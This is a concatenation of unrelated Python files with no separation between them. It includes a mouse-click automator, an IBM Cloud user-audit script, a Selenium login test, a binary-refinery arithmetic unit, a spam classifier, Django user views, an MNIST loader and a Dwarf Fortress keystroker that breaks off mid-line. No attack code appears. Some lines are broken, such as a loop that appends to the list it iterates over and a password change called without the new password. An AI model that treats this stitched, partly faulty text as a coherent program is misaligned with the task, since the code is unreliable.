Automator from config import _stored_mouse_positions_dir_pathlib FILE_PATH = _stored_mouse_positions_dir_pathlib / "mouse_positions_example.txt" IDLE_TIME = 5 def run_infinite_mouse_click(): automator = Automator() print(f"\nStarted automated process!!\n" f"To stop the process use ctrl+C...\n") positions_json = automator.get_mouse_positions_from_file(FILE_PATH) try: for key, position in positions_json.items(): print(f"Clicking {position} in {IDLE_TIME} seconds...") automator.idle_time(IDLE_TIME) automator.click(position) except KeyboardInterrupt: print("\nProcess interrupted sucessfully") if __name__ == "__main__": run_infinite_mouse_click() from uuid import UUID, uuid4 from typing import List class AnswerOption: def __init__(self, text: str = "default initialization value", is_correct: bool = False, its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.text: str = text self.is_correct: bool = is_correct class Question: def __init__(self, question: str, answer_options: List[AnswerOption], its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.text: str = question if answer_options is None: self.answer_options: List[AnswerOption] = [] else: self.answer_options: List[AnswerOption] = answer_options class Quiz: def __init__(self, name: str = 'nameless', questions: List[Question] = None, its_id: UUID = None): if its_id is None: self.id = uuid4() else: self.id: UUID = its_id self.name: str = name if questions is None: self.questions: List[Question] = [] else: self.questions: List[Question] = questions def add_question(self, question: Question) -> None: 
self.questions.append(question) #!/usr/bin/env python3 import yaml try: from yaml import CLoader as Loader, CDumper as Dumper except ImportError: from yaml import Loader, Dumper import os import json import argparse import pandas as pd from datetime import datetime import requests ############################################################################### # FUNCTIONS ############################################################################### def init(): """parse arguments, validate input, set variables""" # commandline arguments # https://docs.python.org/3/library/argparse.html parser = argparse.ArgumentParser(prog='python3 users_report.py -c ../../config.lcoal -u users.yaml -o json') parser.add_argument( "-c", "--config_file", required=True, help="Path to config file" ) parser.add_argument( "-u", "--users_file", required=True, help="Path to users file" ) list_of_output_formats=["csv", "json"] parser.add_argument( "-o", "--output_format", required=False, help="Output format", default="csv", choices=list_of_output_formats ) list_of_order_by=["association", "manager"] parser.add_argument( "-ob", "--order_by", required=False, help="Order By", default="manager", choices=list_of_order_by ) # Parse input arguments args = parser.parse_args() global CONFIG_FILE CONFIG_FILE=args.config_file global USERS_FILE USERS_FILE=args.users_file global OUTPUT_FORMAT OUTPUT_FORMAT=args.output_format global ORDER_BY ORDER_BY=args.order_by # Config values with open(CONFIG_FILE) as jsonfile: config = json.load(jsonfile) global IBM_CLOUD_APIKEY IBM_CLOUD_APIKEY=config['credentials']['ibm_cloud_apikey'] global IBMCLOUD_ORG_ACCOUNTID IBMCLOUD_ORG_ACCOUNTID=config['account']['accountid'] # Generate variable values now = datetime.now() date_time = now.strftime("%Y%m%dT%H%M%S%f") # Build directory global OUTPUT_DIR OUTPUT_DIR_ROOT='build' if(not os.path.exists(OUTPUT_DIR_ROOT)): os.makedirs(OUTPUT_DIR_ROOT) OUTPUT_DIR=("{}/{}").format(OUTPUT_DIR_ROOT, date_time) if(not os.path.exists(OUTPUT_DIR)): os.makedirs(OUTPUT_DIR) global USERS_REPORT_ORDERED_OUTPUT_FILENAME USERS_REPORT_ORDERED_OUTPUT_FILENAME=('{}/users_report_orderedby_{}_{}.{}').format(OUTPUT_DIR, ORDER_BY, date_time, OUTPUT_FORMAT) global USERS_REPORT_UNORDERED_OUTPUT_FILENAME USERS_REPORT_UNORDERED_OUTPUT_FILENAME=('{}/users_report_{}.{}').format(OUTPUT_DIR, date_time, OUTPUT_FORMAT) global VALID_USERS_OUTPUT_FILENAME VALID_USERS_OUTPUT_FILENAME = ('{}/valid_users_hcbt_{}.{}').format(OUTPUT_DIR, date_time, OUTPUT_FORMAT) global IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME = ('{}/ibmcloud_users_{}_{}.{}').format(OUTPUT_DIR, IBMCLOUD_ORG_ACCOUNTID, date_time, OUTPUT_FORMAT) print( ("Running Users Report using Config File: {}, Ordered By: {}, Output format: {}, " + "Valid Users File: {}, Valid Users Output File: {}, IBM Cloud Account Output file: {}, " + "Ordered Users Report Output File: {}, Unordered Users Report Output File: {}") .format( CONFIG_FILE, ORDER_BY, OUTPUT_FORMAT, USERS_FILE, VALID_USERS_OUTPUT_FILENAME, IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME, USERS_REPORT_ORDERED_OUTPUT_FILENAME, USERS_REPORT_UNORDERED_OUTPUT_FILENAME ) ) def get_managers_from_users(users): """get_managers_from_users(users)""" managers=[] manager_emails=[] for user in users: user_manager_email=user["manager"] if (user_manager_email not in manager_emails): user_manager = { "email": user_manager_email } # add email to manager_emails array for user cross check below manager_emails.append(user_manager_email) # add full manager user to 
managers array for user in users: if(user["email"] == user_manager_email): user_manager["email"] = user["email"] user_manager["name"] = user["name"] user_manager["association"] = user["association"] managers.append(user_manager) return managers def get_users_for_manager(manager, valid_users): """get_users_for_manager(manager, valid_users)""" users_for_manager=[] for user in valid_users: user_manager_email=user["manager"] if (user_manager_email == manager["email"]): users_for_manager.append(user) return users_for_manager def get_associations_from_users(users): """get_associations_from_users(users)""" associations=[] for user in users: user_association=user["association"] if (user_association not in associations): associations.append(user_association) return associations def get_users_for_association(association, valid_users): """get_users_for_association(association, valid_users)""" users_for_association=[] for user in valid_users: user_association=user["association"] if (user_association == association): users_for_association.append(user) return users_for_association def get_ibmcloud_access_token(): """get_ibmcloud_access_token()""" url = "https://iam.cloud.ibm.com/identity/token" payload= { "apikey" : IBM_CLOUD_APIKEY, "response_type" : "cloud_iam", "grant_type" : "urn:ibm:params:oauth:grant-type:apikey" } headers = { 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded', } response = requests.request("POST", url, headers=headers, data=payload) access_token=response.json()['access_token'] return access_token def get_ibmcloud_users(): """get_ibm_cloud_users()""" # doc: https://cloud.ibm.com/apidocs/user-management#list-users IBMCLOUD_ACCOUNT_USERS_URL = "https://user-management.cloud.ibm.com/v2/accounts/{}/users".format(IBMCLOUD_ORG_ACCOUNTID) access_token = get_ibmcloud_access_token() #ORG_NAME="" #ORG_REGION=us-south #ORG_ACCOUNTID= # ibmcloud account org-users $ORG_NAME -r $ORG_REGION --output json > build/org_users.json headers1 = { 'Authorization': access_token, 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded', } payload = { 'grant_type': 'urn:ibm:params:oauth:grant-type:apikey', 'apikey' : 'iam_apikey' } response = requests.get(url=IBMCLOUD_ACCOUNT_USERS_URL, headers=headers1, data=payload) ibmcloud_users = response.json()['resources'] return ibmcloud_users def get_users_report(valid_users, ibmcloud_account_users): """get_users_report()""" users_report = [] valid_account_users = [] invalid_account_users = [] # use case 1: find users in account not in valid_users for account_user in ibmcloud_account_users: # check if account user is in valid_users is_valid_user=False for valid_user in valid_users: if ( account_user["email"] == valid_user["email"] ): account_user["name"] = valid_user["name"] account_user["identities"] = valid_user["identities"] if "resourceGroups" in valid_user: account_user["resourceGroups"] = valid_user["resourceGroups"] account_user["manager"] = valid_user["manager"] account_user["association"] = valid_user["association"] is_valid_user=True if is_valid_user: valid_account_users.append(account_user) else: invalid_account_users.append(account_user) users_report = { "valid_account_users" : valid_account_users, "invalid_account_users" : invalid_account_users } return users_report def write_to_file(report_lines, output_filename): """write to file""" if OUTPUT_FORMAT == "json": with open(output_filename, 'w') as fp: json.dump(report_lines, fp) elif OUTPUT_FORMAT == "csv": df = 
pd.read_json(json.dumps(report_lines)) df.to_csv(output_filename) else: with open(output_filename, 'w') as fp: json.dump(report_lines, fp) ############################################################################### # MAIN ############################################################################### init() # get valid users valid_users = [] with open(USERS_FILE, 'r') as stream: data_json = yaml.load(stream, Loader=Loader) report=[] valid_users = data_json["users"] write_to_file(valid_users, VALID_USERS_OUTPUT_FILENAME) # get ibmcloud account users ibmcloud_account_users=get_ibmcloud_users() write_to_file(ibmcloud_account_users, IBMCLOUD_ACCOUNT_USERS_OUTPUT_FILENAME) # cross-validate valid_users and ibmcloud_account_users # users_report = { # "valid_account_users" : valid_account_users, # "invalid_account_users" : invalid_account_users users_report_users = get_users_report(valid_users, ibmcloud_account_users) write_to_file(users_report_users, USERS_REPORT_UNORDERED_OUTPUT_FILENAME) # order users_report_users by order_by ordered_users_report_users = [] if(ORDER_BY=="association"): associations=get_associations_from_users(valid_users) valid_users_by_association = [] invalid_users_by_association = [] for association in associations: valid_users_for_association=get_users_for_association(association, users_report_users["valid_account_users"]) valid_users_by_association.append( { "name" : association, "valid_users" : valid_users_for_association } ) users_report_users = [{ "valid_users_by_association" : valid_users_by_association, "invalid_users" : users_report_users["invalid_account_users"], }] else: managers=get_managers_from_users(valid_users) valid_users_by_manager = [] invalid_users_by_manager = [] for manager in managers: valid_users_for_manager=get_users_for_manager(manager, users_report_users["valid_account_users"]) manager["valid_users"] = valid_users_for_manager valid_users_by_manager.append(manager) users_report_users = [{ "valid_users_by_manager" : valid_users_by_manager, "invalid_users" : users_report_users["invalid_account_users"], }] write_to_file(users_report_users, USERS_REPORT_ORDERED_OUTPUT_FILENAME) tnakae/irspack from pkg_resources import DistributionNotFound, get_distribution try: __version__ = get_distribution("irspack").version except DistributionNotFound: # pragma: no cover # package is not installed pass # pragma: no cover from irspack.definitions import DenseScoreArray, InteractionMatrix, UserIndexArray from irspack.evaluator import * from irspack.optimizers import * from irspack.recommenders import * from irspack.split import * from irspack.utils import * digital-asset/dazl-client1-10 # Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 from asyncio import new_event_loop, set_event_loop from threading import Thread from dazl import Network, Party from dazl.damlast.pkgfile import Dar def blocking_setup(url: str, dar: Dar) -> "Party": """ Set up a ledger for a test in a completely blocking fashion. Used by the tests that test the thread-safe variants of the dazl API where avoiding contamination of the current async context is more important than the performance ramifications of calling this function. :param url: The URL of the remote Ledger API implementation to connect to. :param dar: A DAR file. :return: A newly allocated ``Party`` that is guaranteed to be used by no other client. 
""" return Setup(url, dar).run() class Setup: def __init__(self, url, dar): self.url = url self.party = None self.dar = dar self.network = None def run(self): # upload our DAR and allocate our Party in a completely separate thread as to try to avoid # polluting the current context t = Thread(target=self._main) t.start() t.join() return self.party def _main(self): # create a private event loop just for us set_event_loop(new_event_loop()) self.network = Network() self.network.set_config(url=self.url) client = self.network.aio_new_party() self.party = client.party self.network.run_until_complete(self.upload_dar()) async def upload_dar(self): await self.network.aio_global().ensure_dar(self.dar) iamjadhav/mobile_robot_arm import ikpy.chain import numpy as np def deg2rad(th): return th * np.pi / 180 my_chain = ikpy.chain.Chain.from_urdf_file("robot_arm.urdf") th1 = float(input("Enter rotation (in deg) for Rotating Arm: ")) th2 = float(input("Enter rotation (in deg) for Extending Arm: ")) th3 = float(input("Enter rotation (in deg) for Picking Arm: ")) th4 = float(input("Enter rotation (in deg) for Jaw Arm: ")) target_angle = [0, deg2rad(th1), deg2rad(th2), deg2rad(th3), deg2rad(th4), 0] position = my_chain.forward_kinematics(target_angle) print("Input joint angles: (%s, %s, %s, %s, %s, %s)" % (target_angle[0], target_angle[1], target_angle[2], target_angle[3], target_angle[4], target_angle[5])) print("X coordinate for end effector: ", position[0, 3]) print("Y coordinate for end effector: ", position[1, 3]) print("Z coordinate for end effector: ", position[2, 3]) 11110000 00001111 11110000 00001111 11110000 11111111 11000011 00111100 #coding=utf-8 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys from selenium.webdriver.support.ui import Select from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.action_chains import ActionChains import unittest, time, re ,random,os import HTMLTestRunner # from selenium import webdriver # from selenium.webdriver.common.by import By # from selenium.webdriver.common.keys import Keys # from selenium.webdriver.support.ui import Select # from selenium.common.exceptions import NoSuchElementException # import time, re,HTMLTestRunner # import unittest # browser=webdriver.Chrome() # browser.get("http://www.baidu.com") # try: # browser.find_element_by_id("kwssss").send_keys("aaaaaaa") # browser.find_element_by_id("su").click() # except: # browser.get_screenshot_as_file(u"E:\工作任务\error_png.png") class Boss(unittest.TestCase): def setUp(self): self.driver = webdriver.Chrome() self.driver.implicitly_wait(30) self.Boss_url = "https://cas.qa.great-tao.com:8443/cas-server/login?service=http://boss.qa.great-tao.com/cas" self.verificationErrors = [] self.accept_next_alet=True def test_boss(self): try: driver = self.driver driver.get(self.Boss_url) driver.maximize_window() driver.find_element_by_id("username").send_keys("yuanjunling") driver.find_element_by_id("password").send_keys("") driver.find_element_by_id("captcha").send_keys("") driver.find_element_by_id("captcha").send_keys(Keys.ENTER) driver.close() except: driver.get_screenshot_as_file(u"E:\工作任务\异常截图\error_png.png") def is_element_present(self,how,what): try: self.driver.find_element(by=how,value=what) except NoSuchElementException,e :return False return True def tearDown(self): self.driver.quit() self.assertEqual([],self.verificationErrors) # if __name__ 
== "__main__ ": # 定义一个单元测试容器 # testunit = unittest.TestSuite() # 将测试用例加入到测试容器中 # testunit.addTest(Boss("test_boss")) # 定义个报告存放路径,支持相对路径 # filename = 'D:\\selenium_python\\report\\result.html' # fp = file(filename, 'wb') # 定义测试报告 # runner = HTMLTestRunner.HTMLTestRunner( # stream=fp, # title=u'BOSS报告', # description=u'用例执行情况:') # 运行测试用例 # runner.run(testunit) 0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import annotations from refinery.units.blockwise import Arg, ArithmeticUnit, FastBlockError from refinery.lib.meta import metavars from refinery.lib.argformats import PythonExpression class IndexCounter: mask: int index: int def init(self, mask): self.mask = mask self.index = -1 def __iter__(self): return self def __next__(self): self.index = index = self.index + 1 & self.mask return index class alu(ArithmeticUnit): """ The arithmetic-logical unit. It allows you to specify a custom Python expression where the following variables are allowed: - the variable `A`: same as `V[0]` - the variable `B`: current block - the variable `N`: number of bytes in the input - the variable `I`: current index in the input - the variable `S`: an optional seed value for an internal state - the variable `V`: the vector of arguments Each block of the input is replaced by the value of this expression. Additionally, it is possible to specify prologue and epilogue expressions which are used to update the state variable `S` before and after the update of each block, respectively. """ @staticmethod def _parse_op(definition, default=None): """ An argparse type which uses the `refinery.lib.argformats.PythonExpression` parser to parse the expressions that can be passed to `refinery.alu`. Essentially, these are Python expressions which can contain variables `B`, `A`, `S`, and `V`. """ if not definition: if default is None: raise ValueError('No definition given') definition = default return PythonExpression(definition, *'IBASNV', all_variables_allowed=True) def __init__( self, operator: Arg(type=str, help='A Python expression defining the operation.'), *argument, seed: Arg('-s', type=str, help=( 'Optional seed value for the state variable S. The default is zero. This can be an expression ' 'involving the variable N.')) = 0, prologue: Arg('-p', type=str, metavar='E', help=( 'Optional expression with which the state variable S is updated before a block is operated on.')) = None, epilogue: Arg('-e', type=str, metavar='E', group='EPI', help=( 'Optional expression with which the state variable S is updated after a block was operated on.')) = None, inc: Arg('-I', group='EPI', help='equivalent to --epilogue=S+1') = False, dec: Arg('-D', group='EPI', help='equivalent to --epilogue=S-1') = False, cbc: Arg('-X', group='EPI', help='equivalent to --epilogue=(B)') = False, bigendian=False, blocksize=1, precision=None ): for flag, flag_is_set, expression in [ ('--cbc', cbc, '(B)'), ('--inc', inc, 'S+1'), ('--dec', dec, 'S-1'), ]: if flag_is_set: if epilogue is not None: raise ValueError( F'Ambiguous specification; epilogue was already set to {epilogue} ' F'when {flag} was parsed.' 
) epilogue = expression self._index = IndexCounter() super().__init__( self._index, *argument, bigendian=bigendian, blocksize=blocksize, precision=precision, seed=seed, operator=self._parse_op(operator), prologue=self._parse_op(prologue, 'S'), epilogue=self._parse_op(epilogue, 'S'), ) @property def _is_ecb(self): return not self.args.epilogue and not self.args.prologue def _fastblock(self, _): raise FastBlockError def process(self, data): context = dict(metavars(data)) seed = self.args.seed if isinstance(seed, str): seed = PythonExpression(seed, 'N', constants=metavars(data)) if callable(seed): seed = seed(context, N=len(data)) self._index.init(self.fmask) prologue = self.args.prologue.expression epilogue = self.args.epilogue.expression operator = self.args.operator.expression context.update(N=len(data), S=seed) def operate(block, index, *args): context.update(I=index, B=block, V=args) if args: context['A'] = args[0] context['S'] = eval(prologue, None, context) context['B'] = eval(operator, None, context) context['S'] = eval(epilogue, None, context) return context['B'] placeholder = self.operate self.operate = operate result = super().process(data) self.operate = placeholder return result @staticmethod def operate(block, index, *args): raise RuntimeError('This operate method cannot be called.') def inplace(self, block, *args) -> None: super().inplace(block, *args) classifier.py import pandas as pd import pprint import numpy as np def readDataSet(): #make a dataframe df = pd.read_table('dataset/SMSSpamCollection', sep ='\t', header =None, names = ['label', 'message']) #label features with 0 and 1 df['label'] = df.label.map({'ham':0, 'spam':1}) return df #test_string = "ham Congratulations you won lottery of 100000$ to aavail give your bank info" def getTrainingTestingData(df): from sklearn.model_selection import train_test_split as tts x_message_train, x_message_test, y_label_train, y_label_test = tts(df['message'], df['label'], random_state = 1) from sklearn.feature_extraction.text import CountVectorizer #implimenting bag of words count_vector = CountVectorizer(stop_words = 'english') #print(count_vector) #dividing in training and testing data training_data = count_vector.fit_transform(x_message_train) testing_data = count_vector.transform(x_message_test) return { "training_data" : training_data, "testing_data" :testing_data, "y_label_train" : y_label_train, "y_label_test" : y_label_test } def make_predictions(train_test_data): from sklearn.naive_bayes import MultinomialNB nb = MultinomialNB() nb.fit(train_test_data["training_data"], train_test_data["y_label_train"]) predictions = nb.predict(train_test_data["testing_data"]) return predictions def print_accuracy(train_test_data, predictions): from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score print("Accuracy Score: "+format(accuracy_score(train_test_data["y_label_test"], predictions))) print("Precision Score: "+ format(precision_score(train_test_data["y_label_test"], predictions))) print("Recall Score : "+format(recall_score(train_test_data["y_label_test"], predictions))) print("f1 Score : "+format(f1_score(train_test_data["y_label_test"], predictions))) def runScript(): df = readDataSet() train_test_data = getTrainingTestingData(df) predictions = make_predictions(train_test_data) print_accuracy(train_test_data, predictions) runScript()1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- # # @Author: () # @Date: 2019-11-12 # @Filename: __init__.py # @License: BSD 3-clause 
(http://www.opensource.org/licenses/BSD-3-Clause) from typing import TYPE_CHECKING from clu import Command from clu.parsers.click import command_parser from jaeger.actor import JaegerActor jaeger_parser = command_parser JaegerCommandType = Command[JaegerActor] from .can import * from .chiller import * from .configuration import * from .debug import * from .disable import * from .fvc import * from .ieb import * from .pollers import * from .positioner import * from .power import * from .snapshot import * from .talk import * from .unwind import * from .version import * ejercicios_python/Clase01/geringosov2.py # -*- coding: utf-8 -*- """ # Geringoso.py # Ejercicio 1.18 # @author: """ cadena = 'Geringoso' capadepenapa = '' for c in cadena: if c in 'aeiou': capadepenapa += c+'p'+c else: capadepenapa += c print(capadepenapa) """ resultado: Geperipingoposopo """ #%% cadena = input("Coloque su palabra: ") capadepenapa = '' for c in cadena: if c in 'aeiou': capadepenapa += c+'p'+c else: capadepenapa += c print(capadepenapa) from rest_framework.permissions import BasePermission def get_user(request): return request.user class IsStaff(BasePermission): """ Grants permission if the logged-in user is considered staff See https://docs.djangoproject.com/en/3.1/ref/contrib/auth/#django.contrib.auth.models.User.is_staff """ def has_permission(self, request, view): return request.user.is_staff def has_object_permission(self, request, view, obj): return request.user.is_staff class IsSuperUser(BasePermission): """ Grants permission if the logged-in user is considered a superuser See https://docs.djangoproject.com/en/3.1/ref/contrib/auth/#django.contrib.auth.models.User.is_superuser """ def has_permission(self, request, view): return request.user.is_superuser def has_object_permission(self, request, view, obj): return request.user.is_superuser# Create your views here. 
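# --- Hedged usage sketch (not part of the original permissions module) -------
# The docstrings above describe when IsStaff / IsSuperUser grant access; the
# hypothetical view below shows how such a class might be attached to a Django
# REST Framework APIView. The view name and response payload are illustrative
# assumptions, not project code.
from rest_framework.response import Response
from rest_framework.views import APIView


class StaffOnlyHealthCheck(APIView):
    """Hypothetical endpoint that only staff accounts may call."""

    # DRF calls IsStaff.has_permission() before dispatching to get().
    permission_classes = [IsStaff]

    def get(self, request):
        return Response({"status": "ok", "staff": request.user.is_staff})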
import logging from django.contrib.auth.models import User from drf_yasg.utils import swagger_auto_schema from rest_framework.exceptions import ValidationError, APIException, AuthenticationFailed from rest_framework.permissions import IsAuthenticated from rest_framework.views import APIView from rest_framework_jwt.authentication import JSONWebTokenAuthentication from user.serializers import UserInfoOut, ChangePwdIn, UpdateUserInfoIn, ChangePwdOut from utils.errors import ERROR from utils.resp import r200 logger = logging.getLogger(__name__) class UserInfoAPI(APIView): """ Get user info """ authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(responses={200: UserInfoOut}, tags=['user']) def get(self, request, *args, **kwargs): logger.info(f'user {request.user} get info') data_out = UserInfoOut(instance=request.user) return r200(data_out.data) class ChangePwdAPI(APIView): authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(request_body=ChangePwdIn, responses={200: ChangePwdOut}, tags=['user']) def post(self, request, *args, **kwargs): logger.info(f'[change password] data: {request.data}') data_in = ChangePwdIn(data=request.data) if not data_in.is_valid(): logger.error(data_in.errors) err = ERROR['INPUT'] err['data'] = data_in.errors raise ValidationError(err) old_password = data_in.validated_data['old_password'] new_password = data_in.validated_data['new_password'] try: if request.user.check_password(old_password): request.user.set_password() request.user.save(update_fields=['password']) else: logger.error('Invalid old password') err = ERROR['INVALID_PASSWORD'] raise AuthenticationFailed(err) except Exception as e: logger.error(f'Failed to change password: {e}') err = ERROR['CHANGE_PASSWORD_FAILED'] err['data'] = str(e) raise APIException(err) data_out = ChangePwdOut(instance=dict(success=True)) logger.info(f'[change password] id: {request.user} success: {data_out.data}') return r200(data=data_out.data) class UpdateInfoAPI(APIView): authentication_classes = (JSONWebTokenAuthentication,) permission_classes = (IsAuthenticated,) @swagger_auto_schema(request_body=UpdateUserInfoIn, responses={200: UserInfoOut}, tags=['user']) def post(self, request, *args, **kwargs): logger.info(f'[update info] data: {request.data}') data_in = UpdateUserInfoIn(data=request.data) if not data_in.is_valid(): logger.error(data_in.errors) raise ValidationError(data_in.errors) try: user = User.objects.filter(id=request.user.id) user.update(**data_in.validated_data) except Exception as e: logger.error(f'Failed to update user info: {e}') err = ERROR('USER_INFO_DATABASE') err['data'] = str(e) raise APIException(err) data_out = UserInfoOut(instance=user[0]) logger.info(f'[update info] id: {user} success {data_out.data}') return r200(data=data_out.data) """ Module for container object for the mnist data_set """ import numpy as np import cv2 class MnistDataset(object): def __init__(self, data_set_path, evaluation_set_path, size_reduction = False): self.training_data = np.array([]) self.evaluation_data = np.array([]) self.batch_size = 0 self.batches = 0 self.data_vector_size = 784 self.label_vector_size = 10 tmp_training_data = np.loadtxt(data_set_path, delimiter=',') tmp_evaluation_data = np.loadtxt(evaluation_set_path, delimiter=',') np.random.shuffle(tmp_training_data) if size_reduction: self.data_vector_size = 196 tr_imgs = tmp_training_data[:,:-1] ev_imgs = tmp_evaluation_data[:,:-1] new_tr_data 
= np.zeros([len(tmp_training_data), self.data_vector_size + 1]) new_ev_data = np.zeros([len(tmp_evaluation_data), self.data_vector_size + 1]) for i in range(len(tmp_training_data)): new_tr_data[i] = np.concatenate((np.reshape(cv2.resize(np.reshape(tr_imgs[i], (28, 28)), dsize = (14, 14)), 196), tmp_training_data[i,-1:])) for i in range(len(tmp_evaluation_data)): new_ev_data[i] = np.concatenate((np.reshape(cv2.resize(np.reshape(ev_imgs[i], (28, 28)), dsize = (14, 14)), 196), tmp_evaluation_data[i,-1:])) tmp_training_data = new_tr_data tmp_evaluation_data = new_ev_data # Form data in a formation where the first are the actual data and last 10 elements are the labels # The training data is float normalized between 0 and 1, and label data is 1 or 0 self.training_data = np.zeros([len(tmp_training_data), self.data_vector_size + self.label_vector_size]) self.evaluation_data = np.zeros([len(tmp_evaluation_data), self.data_vector_size + self.label_vector_size]) self.training_data[:,:-10] = tmp_training_data[:,1:] self.evaluation_data[:,:-10] = tmp_evaluation_data[:,1:] label_array = np.zeros([len(tmp_training_data), 10]) label_array[range(len(tmp_training_data)), tmp_training_data[:,0].astype(int)] = 1 self.training_data[:,-10:] = label_array self.training_data[:,:-10] /= 255 label_array = np.zeros([len(tmp_evaluation_data), 10]) label_array[range(len(tmp_evaluation_data)), tmp_evaluation_data[:,0].astype(int)] = 1 self.evaluation_data[:,-10:] = label_array self.evaluation_data[:,:-10] /= 255 def get_training_data(self): return self.training_data def get_training_data_without_labels(self): return self.training_data[:,:-10] def get_training_labels(self): return self.training_data[:,-10:] def get_evaluation_data(self): return self.evaluation_data def get_evaluation_data_without_labels(self): return self.evaluation_data[:,:-10] def get_evaluation_labels(self): return self.evaluation_data[:,-10:] def get_validation_data(self, batch_size, validation_set): return self.training_data[:validation_set * batch_size,:-10] def get_validation_labels(self, batch_size, validation_set): return self.training_data[:validation_set * batch_size,-10:] def get_batches(self, batch_size, include_labels = False, validation_set = 0): """ Function for formatting the batches correctly """ batch_amount = int(len(self.get_training_data()) / batch_size) if include_labels: data_set = np.copy(self.get_training_data()) else: data_set = np.copy(self.get_training_data_without_labels()) return np.reshape(data_set, [batch_amount, batch_size, len(data_set[0])])[validation_set:] MWDF Project/MasterworkDwarfFortress/Utilities/Quickfort/src/qfconvert/keystroker.py """Handles conversion from QF keycode lists to keystrokes or DF macros.""" from copy import copy from math import sqrt import os import re import random from filereader import load_json from geometry import Area, Direction, add_points, scale_point, midpoint import exetest import util # load global KEY_LIST which is used liberally below and would be inefficient to constantly reload KEY_LIST = load_json(os.path.join(exetest.get_main_dir(), "config/keys.json")) class KeystrokerError(Exception): """Base class for keystroker errors.""" class Keystroker: """ Computes keycodes needed to go through route and transforms those keycodes into keystrokes or DF macro commands. Returns list keystrokes or DF macro lines. 
""" def __init__(self, grid, buildconfig): self.grid = grid self.buildconfig = buildconfig def plot(self, plots, cursor): """ Follows the route given by plots, generating the keys necessary to plot/designate those areas in DF. Returns list of keycodes generated and ending cursor position as ([String], Point). """ submenukeys = self.buildconfig.get('submenukeys') last_command = '' last_submenu = '' keys = copy(self.buildconfig.get('init')) or [] completed = self.buildconfig.get('completed') or [] # construct the list of keystrokes required to move to each # successive area and build it for pos in plots: cell = self.grid.get_cell(*pos) command = cell.command endpos = cell.area.opposite_corner(pos) subs = {} # get samecmd or diffcmd depending on if the command is # different from the previous iteration's command if command == last_command: nextcmd = self.buildconfig.get('samecmd', command) or [] else: nextcmd = self.buildconfig.get('diffcmd', command) or [] last_command = command # moveto = keys to move cursor to starting area-corner subs['moveto'] = self.move(cursor, pos) # setsize = keys to set area to desired dimensions setsizefun = getattr(self, self.buildconfig.get('setsize', command)) setsize, newpos = setsizefun(pos, endpos) subs['setsize'] = setsize # look for mat selection syntax like Cw:1 mat_label = None if ':' in command: match = re.search(r'(.+):([\w]+)$', command) if match is None: raise KeystrokerError( 'Invalid characters in material label: ' + command) # split command:mat_label into command and mat_label command = match.group(1) mat_label = match.group(2) # TODO: pitch a fit if we're not in key output mode # subs['setmats'] keys are used to select mats for an area setmatscfg = self.buildconfig.get('setmats', command) if setmatscfg: setmatsfun = getattr(self, setmatscfg) subs['setmats'] = setmatsfun(cell.area.size(), mat_label) # handle submenus use_command = None for k in submenukeys: if re.match(k, command): # this command needs to be called in a DF submenu submenu = command[0] if not last_submenu: # entering a new submenu and not currently in one subs['menu'] = submenu subs['exitmenu'] = [] last_submenu = submenu elif last_submenu != submenu: # switching from one submenu to another subs['exitmenu'] = ['^'] # exit previous submenu subs['menu'] = submenu # enter new menu last_submenu = submenu else: # same submenu subs['menu'] = [] subs['exitmenu'] = [] # drop the submenu key from command use_command = command[1:] continue # no known submenu found in command? 
if not use_command: if last_submenu: # was in a submenu, now want to be at parent menu subs['exitmenu'] = ['^'] else: # was at root menu and want to continue being there subs['exitmenu'] = [] subs['menu'] = [] last_submenu = '' use_command = command[:] # break command into keycodes codes = split_keystring_into_keycodes(use_command) # substitute keycodes into nextcmd where we find the string 'cmd' nextcodes = [] for c in nextcmd: if c == 'cmd': nextcodes.extend(codes) else: nextcmd.append(c) # nextcodes is now our command-key string subs['cmd'] = nextcodes pattern = self.buildconfig.get('designate', command) newkeys = [] # do pattern subs (and throw away empty elements) for p in pattern: if p in subs: newkeys.extend(subs[p]) else: newkeys.append(p) # add our transformed keys to keys keys.extend(newkeys) # move cursor pos to end corner of built area cursor = newpos # if we're in a submenu, exit it if last_submenu: keys.append('^') # append on-completed keys, if any keys.extend(completed) return (keys, cursor) @staticmethod def get_z_moves(zoffset): """ Get the apprioriate number of > or < chars reflecting zoffset. """ if zoffset > 0: return ['>'] * zoffset if zoffset < 0: return ['<'] * abs(zoffset) return [] def move(self, (x1, y1), (x2, y2), zoffset=0, allowjumps=True): """ Returns list of keycodes needed to move DF cursor from (x1, y1) to (x2, y2) and adjust z-level by zoffset if provided. """ keys = [] # do z-moves first if needed keys += Keystroker.get_z_moves(zoffset) allow_overshoot = True # whether we may overshoot the target coords while x1 != x2 or y1 != y2: # while there are moves left to make.. direction = Direction.get_direction((x1, y1), (x2, y2)) # Get x and y component of distance between start and end dx = abs(x2 - x1) dy = abs(y2 - y1) if dx == 0: steps = dy # moving on y axis only elif dy == 0: steps = dx # moving on x axis only else: # determine max diagonal steps we can take # in this direction without going too far steps = min([dx, dy]) keycode = ['[' + direction.compass + ']'] jumpkeycode = ['[+' + direction.compass + ']'] move = direction.delta() if not allowjumps or steps < 8 or not allow_overshoot: # render single movement keys keys.extend(keycode * steps) (x1, y1) = add_points((x1, y1), scale_point(move, steps)) allow_overshoot = True else: # use DF's move-by-10-units commands jumps = (steps // 10) leftover = steps % 10 jumpmove = scale_point(move, 10) # backtracking optimization if leftover >= 8: # test if jumping an extra 10-unit step # would put us outside of the bounds of # the blueprint (want to prevent) (xt, yt) = add_points((x1, y1), scale_point(jumpmove, (jumps + 1))) if 